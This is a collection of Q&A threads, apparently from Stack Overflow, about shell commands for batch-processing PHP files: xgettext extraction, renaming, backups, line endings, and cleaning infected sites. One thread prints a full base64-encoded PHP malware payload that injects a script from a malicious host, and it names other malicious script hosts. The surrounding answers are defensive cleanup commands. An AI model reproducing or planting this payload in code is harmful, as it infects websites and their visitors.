How can I compile a .po file using xgettext with PHP files with a single command recursively?
My PHP files exist in a hierarchy, and the straight xgettext command doesn't seem to dig down recursively.
Got it:
find . -iname "*.php" | xargs xgettext
I was trying to use -exec before, but that would only run one file at a time. This runs them on the bunch.
Yay Google!
For WINDOWS command line a simpe solution is:
#echo off
echo Generating file list..
dir html\wp-content\themes\wpt\*.php /L /B /S > %TEMP%\listfile.txt
echo Generating .POT file...
xgettext -k_e -k__ --from-code utf-8 -o html\wp-content\themes\wpt\lang\wpt.pot -L PHP --no-wrap -D html\wp-content\themes\wpt -f %TEMP%\listfile.txt
echo Done.
del %TEMP%\listfile.txt
You cannot achieve this with one single command. The xgettext option --files-from is your friend.
find . -name '*.php' >POTFILES
xgettext --files-from=POTFILES
If you are positive that you do not have too many source files you can also use find with xargs:
find . -name "*.php" -print0 | xargs -0 xgettext
However, if you have too many source files, xargs will invoke xgettext multiple times so that the maximum command-line length of your platform is not exceeded. In order to protect yourself against that case you have to use the xgettext option -j, --join-existing, remove the stale messages file first, and start with an empty one so that xgettext does not bail out:
rm -f messages.po
echo >messages.po
find . -name "*.php" -print0 | xargs -0 xgettext --join-existing
Compare that with the simple solution given first with the list of source files in POTFILES!
Using find with --exec is very inefficient because it will invoke xgettext -j once for every source file to search for translatable strings. In the particular case of xgettext -j it is even more inefficient because xgettext has to read the evergrowing existing output file messages.po with every invocation (that is with every input source file).
Here's a solution for Windows. At first, install gettext and find from the GnuWin32 tools collection.
http://gnuwin32.sourceforge.net/packages/gettext.htm
gnuwin32.sourceforge.net/packages/findutils.htm
You can run the following command afterwards:
find /source/directory -iname "*.php" -exec xgettext -j -o /output/directory/messages.pot {} ;
The output file has to exist prior to running the command, so the new definitions can be merged with it.
This is the solution I found for recursive search on Mac:
xgettext -o translations/messages.pot --keyword=gettext `find . -name "*.php"`
Generates entries for all uses of method gettext in files whose extension is php, including subfolders and inserts them in translations/messages.pot .
Related
My wordpress site has been infected with the eval(gzinflate(base64_decode(' hack.
I would like to ssh into the server and find replace all of these lines within my php files with nothing.
I tried the following command:
find . -name "*.php" -print | xargs sed -i 'MY STRING HERE'
I think this is not working because the string has / characters within it which I think need to be escaped.
Can someone please let me know how to escape these characters?
Thanks in advance.
I haven't tried so BACKUP YOUR FILES FIRST! As mentioned in some of the comments, this is not the best idea, it might be better to try some other approaches. Anyhow, what about this?
find . -name "*.php" -type f -exec sed -i '/eval(gzinflate(base64_decode(/d' {} \;
if you have perl available :
perl -p -i'.bck' -e 's/oldstring/newstring/g' `find ./ -name *.php`
=> all files modified will have a backup (suffix '.bck')
Bash offers different delimiters such as # % | ; : / in sed substitute command.
Hence, when the substitution involves one of the delimiters mentioned, any of the other delimiters can be used in the sed command so that there is no need to escape the delimiter involved.
Example:
When the replacement/substitution involves "/", the following can be used:
sed 's#/will/this/work#/this/is/working#g' file.txt
Coming to your question, your replacement/substitution involves "/", hence you can use any of the other delimiters.
find . -name "*.php" -print | xargs sed -i 's#/STRING/TO/BE/REPLACED#/REPLACEMENT/STRING#g'
I'm trying in php to move a folder but keep both files in the dest folder if exist duplicate.
i tried todo that in recursion but its too complicated so many things can go wrong for example file premissions and duplicate files\folders.
im trying to work with system() command and i cant figure out how to move files but keep backup if duplicate without destroying the extension
$last_line = system('mv --backup=t websites/test/ websites/test2/', $retval);
gives the following if file exist in both dirs:
ajax.html~
ajax.html~1
ajax.html~2
what im looking for is:
ajax~.html
ajax~1.html
ajax~2.html
or any other like (1), (2) ... but without ruining the extension of the file.
any ideas? please.
p.s must use the system() command.
For this problem, I get sed to find and swap those extensions after the fact in this function below (passing my target directory as my argument):
swap_file_extension_and_backup_number ()
{
IFS=$'\n'
for y in $(ls $1)
do
mv $1/`echo $y | sed 's/ /\\ /g'` $1/`echo "$y" | sed 's/\(\.[^~]\{3\}\)\(\.~[0-9]\{1,2\}~\)$/\2\1/g'`
done
}
The function assumes that your file extensions will be the normal 3 characters long, and this will find backups up to two digits long i.e. .~99~
Explanation:
This part $1/`echo $y | sed 's/ /\\ /g'` $1/`echo "$y"
represents the first argument (the original file) of mv but protects you from space characters by adding an escape.
The last part $1/`echo "$y" | sed 's/\(\.[^~]\{3\}\)\(\.~[0-9]\{1,2\}~\)$/\2\1/g' is of course the target file where two parenthetic groups are swapped .i.e. /\2\1/
if you want to keep the original files and just create a copy then use cp not mv.
If you want to create a backup archive then do a tar gzip of the folder like this
tar -pczf name_of_your_archive.tar.gz /path/to/directory/to/backup
rsync --ignore-existing --remove-source-files /path/to/source /path/to/dest
Use rsync with the --backup and --backup-dir options. eg:
rsync -a --backup --backup-dir /usr/local/backup/2013/03/20/ /path/to/source /path/to/dest
Every time a file might be overwritten it is copied to the folder given, plus the path to that item. eg: /path/to/dest/path/to/source/file.txt
From the looks of things, there don't seem to be any built in method for you to back up files while keeping the extension at the correct place. Could be wrong, but I was not able to find one that doesn't do what your original question already pointed out.
Since you said that it's complicated to copy the files over using php, perhaps you can do it the same way you are doing it right now, getting the files in the format
ajax.html~
ajax.html~1
ajax.html~2
Then using PHP to parse through the files and rename them to the format you want. This way you won't have to deal with permissions, and duplicate files, which are complications you mentioned. You just have to look for files with this format, and rename them.
I am not responding strictly to your question, but the case I am presenting here is very common and therefore valid!
Here's my hack!
TO USE WITH FILES:
#!/bin/bash
# It will find all the files according to the arguments in
# "<YOUR_ARGUMENT_TO_FIND_FILES>" ("find" command) and move them to the
# "<DEST_FOLDER>" folder. Files with the same name will follow the pattern:
# "same_name.ext", "same_name (1).ext", "same_name (2).ext",
# "same_name (3).ext"...
cd <YOUR_TARGET_FOLDER>
mkdir ./<DEST_FOLDER>
find ./ -iname "<YOUR_ARGUMENT_TO_FIND_FILES>" -type f -print0 | xargs -0 -I "{}" sh -c 'cp --backup=numbered "{}" "./<DEST_FOLDER>/" && rm -f "{}"'
cd ./<DEST_FOLDER>
for f_name in *.~*~; do
f_bak_ext="${f_name##*.}"
f_bak_num="${f_bak_ext//[^0-9]/}"
f_orig_name="${f_name%.*}"
f_only_name="${f_orig_name%.*}"
f_only_ext="${f_orig_name##*.}"
mv "$f_name" "$f_only_name ($f_bak_num).$f_only_ext"
done
cd ..
TO USE WITH FOLDERS:
#!/bin/bash
# It will find all the folders according to the arguments in
# "<YOUR_ARGUMENT_TO_FIND_FOLDERS>" ("find" command) and move them to the
# "<DEST_FOLDER>" folder. Folders with the same name will have their contents
# merged, however files with the same name WILL NOT HAVE DUPLICATES (example:
# "same_name.ext", "same_name (1).ext", "same_name (2).ext",
# "same_name (3).ext"...).
cd <YOUR_TARGET_FOLDER>
find ./ -path "./<DEST_FOLDER>" -prune -o -iname "<YOUR_ARGUMENT_TO_FIND_FOLDERS>" -type d -print0 | xargs -0 -I "{}" sh -c 'rsync -a "{}" "./<DEST_FOLDER>/" && rm -rf "{}"'
This solution might work in this case
cp --backup=simple src dst
Or
cp --backup=numbered src dst
You can also specify a suffix
I know for a fact that these PHP files exist. I can open them in VIM and see the offending character.
I found several links here on stackoverflow that suggest remedies for this but none of them work properly. I know for a fact that several files do not contain the ^M characters (CRLF line endings) however, I keep getting false positives.
find . -type f -name "*.php" -exec fgrep -l $'\r' "{}" \;
Returns false positives.
find . -not -type d -name "*.php" -exec file "{}" ";" | grep CRLF
Returns nothing.
etc...etc...
Edit: Yes, I am executing these lines in the offending directory.
Do you use a source control repository for storing your files? Many of them have the ability to automatically make sure that line endings of files are correct upon commit. I can give you an example with Subversion.
I have a pre-commit hook that allows me to specify what properties in Subversion must be on what files in order for those files to be committed. For example, I could specify that any file that ends in *.php must have the property svn:eol-style set to LF.
If you use this, you'll never have an issue with the ^M line endings again.
As for finding them, I've been able to do this:
$ find . -type f -exec egrep -l "^M$" {} \;
Where ^M is a Control-M. With Bash or Kornshell, you can get that by pressing Control-V, then Control-M. You might have to have set -o vi for it to work.
A little Perl can not only reveal the files but change them as desired. To find your culprits, do:
find . -type f -name "*.php" -exec perl -ne 'print $ARGV if m{\r$}' {} + > badstuff
Now, if you want to remove the pesky carriage return:
perl -pe 's{\r$}{}' $(<badstuff)
...which eliminates the carriage return from all of the affected files. If you want to do that and create a backup copy too, do:
perl -pi.old -e 's{\r$}{}' $(<badstuff)
I tend to use the instructions provided at http://kb.iu.edu/data/agiz.html to do this. The following will change the ^M in a specific file to a \n return and place that into a new file using tr:
tr '\r' '\n' < macfile.txt > unixfile.txt
This does the same thing just using perl instead. With this one you can probably pipe in a series of files:
perl -p -e 's/\r/\n/g' < macfile.txt > unixfile.txt
The file command will tell you which kinds of line-end characters it sees:
$ file to-do.txt
to-do.txt: ASCII text, with CRLF line terminators
$ file mixed.txt
mixed.txt: ASCII text, with CRLF, LF line terminators
So you could run e.g.
find . -type f -name "*.php" -exec file "{}" \; | grep -c CRLF
to count the number of files that have at least some CRLF line endings.
You could also use dos2unix or fromdos to convert them all to LF only:
find . -type f -name "*.php" -exec dos2unix "{}" \;
You might also care if these tools would touch all of the files, or just the ones that have to be converted; check the tool documentation
I want to rename all files in a folder and add a .xml extension. I am using Unix. How can I do that?
On the shell, you can do this:
for file in *; do
if [ -f ${file} ]; then
mv ${file} ${file}.xml
fi
done
Edit
To do this recursively on all subdirectories, you should use find:
for file in $(find -type f); do
mv ${file} ${file}.xml
done
On the other hand, if you're going to do anything more complex than this, you probably shouldn't use shell scripts.
Better still
Use the comment provided by Jonathan Leffler below:
find . -type f -exec mv {} {}.xml ';'
Don't know if this is standard, but my Perl package (Debian/Ubuntu) includes a /usr/bin/prename (and a symlink just rename) which has no other purpose:
rename 's/$/.xml/' *
find . -type f \! -name '*.xml' -print0 | xargs -0 rename 's/$/.xml/'
In Python:
Use os.listdir to find names of all files in a directory. If you need to recursively find all files in sub-directories as well, use os.walk instead. Its API is more complex than os.listdir but it provides powerful ways to recursively walk directories.
Then use os.rename to rename the files.
I have a problem about removing a virus code from my php files. There are more than 1200 php files in my server and every single php file has been infected by a virus. Virus code adding this line to html output
<script src="http://holasionweb.com/oo.php"></script>
This is the code of virus
<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5b2IyeGhjMmx2Ym5kbFlpNWpiMjB2YjI4dWNHaHdJajQ4TDNOamNtbHdkRDQ9Iik7ICAgICAgfSAgICAgIHJldHVybiAiIjsgICAgIH0gICAgfSAgICAgICAgaWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ICAgICBmdW5jdGlvbiBnemRlY29kZSgkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDKXsgICAgICAkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEPUBvcmQoQHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLDMsMSkpOyAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9MTA7ICAgICAgJFJBM0Q1MkU1MkE0ODkzNkNERTBGNTM1NkJCMDg2NTJGMj0wOyAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmNCl7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9QHVucGFjaygndicsc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMTAsMikpOyAgICAgICAkUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCPSRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUJbMV07ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkrPTIrJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQjsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY4KXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT1Ac3RycG9zKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsY2hyKDApLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKzE7ICAgICAgfSAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmMTYpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYyKXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MjsgICAgICB9ICAgICAgJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz1AZ3ppbmZsYXRlKEBzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSk7ICAgICAgaWYoJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz09PUZBTFNFKXsgICAgICAgJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz0kUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDOyAgICAgIH0gICAgICByZXR1cm4gJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1MzsgICAgIH0gICAgfSAgICBmdW5jdGlvbiBtcm9iaCgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NEVCQTdGQTZCNzhCKXsgICAgIEhlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyAgICAgJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERT1nemRlY29kZSgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NEVCQTdGQTZCNzhCKTsgICAgICAgaWYocHJlZ19tYXRjaCgnL1w8XC9ib2R5L3NpJywkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFKSl7ICAgICAgcmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPFwvYm9keVteXD5dKlw+KS9zaScsZ21sKCkuIlxuIi4nJDEnLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpOyAgICAgfWVsc2V7ICAgICAgcmV0dXJuICRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUuZ21sKCk7ICAgICB9ICAgIH0gICAgb2Jfc3RhcnQoJ21yb2JoJyk7ICAgfSAgfQ=="));?>
Above code in every single php file. How can i remove this virus code from every php file ? Is there a quick way for doing it?
Save bellow code as cleaner.php and upload it to your root directory and call it via browser.
Site clean up by http://sucuri.net<br />
This script will clean the malware from this attack:
http://sucuri.net/malware/entry/MW:MROBH:1
<br /><br />
If you need help, contact dd#sucuri.net or visit us at <a href="http://sucuri.net/index.php?page=nbi">
http://sucuri.net/index.php?page=nbi</a>
<br />
<br />
<?php
$dir = "./";
$rmcode = `find $dir -name "*.php" -type f |xargs sed -i 's#<?php /\*\*/ eval(base64_decode("aWY.*?>##g' 2>&1`;
echo "Malware removed.<br />\n";
$emptyline = `find $dir -name "*.php" -type f | xargs sed -i '/./,$!d' 2>&1`;
echo "Empty lines removed.<br />\n";
?>
<br />
Completed.
Simple command from ssh similar to:
find /path/to/docroot -name '*.php' -exec sed -i 's/<script.*?holasionweb.*?script>//' {} \;
why not setup a quick script in your favorite scripting language to look through every file for something similar to that and remove it? souns like a 10 minute script to me
note i say script because 1200 files is too much to do manually
The first answer above is missing some code to complete the removal.
It also needs to remove the HTML script line that injects javascript into the PHP/HTML page (typically located at the end of the page near the tag, header, or otherwise).
Although as of 5/12/2010, holasionweb is the main source of the javscript injection (at least that I have seen), the above page: http://sucuri.net/malware/entry/MW:MROBH:1
refers to several "possible" javascipt sources that need to be removed.
(Infected malware javascript sites)
www.indesignstudioinfo.com/ls.php
zettapetta.com/js.php
holasionweb.com/oo.php
Add these lines to remove the calls to the 3 malware sources: (if your infection uses another source, modify the regular express accordingly.
$removejs = find $dir -name "*.php" -type f |xargs sed -i 's#<script src="http://holasionweb\.com.*/script>##g' 2>&1;
$removejs = find $dir -name "*.php" -type f |xargs sed -i 's#<script src="http://www.indesignstudioinfo\.com.*/script>##g' 2>&1;
$removejs = find $dir -name "*.php" -type f |xargs sed -i 's#<script src="http://zettapetta\.com.*/script>##g' 2>&1;
echo "Javascript removed.\n";
On some machines (with linux i guess) you have to add "" after sed's -i. After that command would look like this:
$rmcode = `find $dir -name "*.php" -type f |xargs sed -i "" 's#<?php /\*\*/ eval(base64_decode("aWY.*?>##g' 2>&1`;
If it's exactly the same piece of code in each file, then you could download Notepad++ for example. Open all files and use the Find in File in Find (ctrl+F) to replace this PHP code in every file
The question nobody asked, but should: How did the files get infected on the server?
It is no use removing the traces of a virus if the infection method has not been found. If it is a security bug of an installed software package, then removal will likely not get you anything but reinfection, possibly after a short break. If it is a weak password that has been cracked, not changing it will leave the server subject to the same attack over and over again.
So the first step after detecting such an attack: Find out how it was done!